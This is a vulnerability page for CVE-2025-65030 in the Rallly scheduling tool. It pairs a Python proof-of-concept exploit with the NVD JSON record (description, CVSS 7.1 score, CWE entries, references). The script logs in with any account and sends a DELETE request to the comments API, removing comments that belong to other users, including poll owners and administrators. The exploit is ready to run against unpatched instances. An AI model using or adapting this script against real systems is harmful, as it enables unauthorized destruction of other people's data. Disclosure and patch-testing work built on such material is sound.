CVE-2025-65030

import requests import json # CVE-2025-65030 PoC - Rallly Comment Deletion Authorization Flaw # Target: Rallly < 4.5.4 TARGET_URL = "https://vulnerable-rallly-instance.com" def delete_comment(cookies, comment_id): """ Delete any comment by ID without ownership verification """ endpoint = f"{TARGET_URL}/api/comments/{comment_id}" response = requests.delete(endpoint, cookies=cookies) return response.status_code == 200 def exploit(): # Step 1: Authenticate with any valid account login_data = {"email": "[email protected]", "password": "password123"} session = requests.Session() login_resp = session.post(f"{TARGET_URL}/api/auth/login", json=login_data) if login_resp.status_code != 200: print("[-] Authentication failed") return False cookies = session.cookies print("[+] Authenticated successfully") # Step 2: Target comment ID (obtained from API or page source) target_comment_id = "VICTIM_COMMENT_ID_HERE" # Step 3: Delete victim comment without ownership check if delete_comment(cookies, target_comment_id): print(f"[+] Successfully deleted comment: {target_comment_id}") return True else: print("[-] Failed to delete comment") return False if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2025-65030", "sourceIdentifier": "[email protected]", "published": "2025-11-19T18:15:50.567", "lastModified": "2025-11-25T15:33:38.803", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Rallly is an open-source scheduling and collaboration tool. Prior to version 4.5.4, an authorization flaw in the comment deletion API allows any authenticated user to delete comments belonging to other users, including poll owners and administrators. The endpoint relies solely on the comment ID for deletion and does not validate whether the requesting user owns the comment or has permission to remove it. This issue has been patched in version 4.5.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}, {"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rallly:rallly:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.5.4", "matchCriteriaId": "05349176-CA4D-4360-A7E1-0EA2D8C24E7E"}]}]}], "references": [{"url": "https://github.com/lukevella/rallly/releases/tag/v4.5.4", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/lukevella/rallly/security/advisories/GHSA-4j32-25f9-qgfm", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}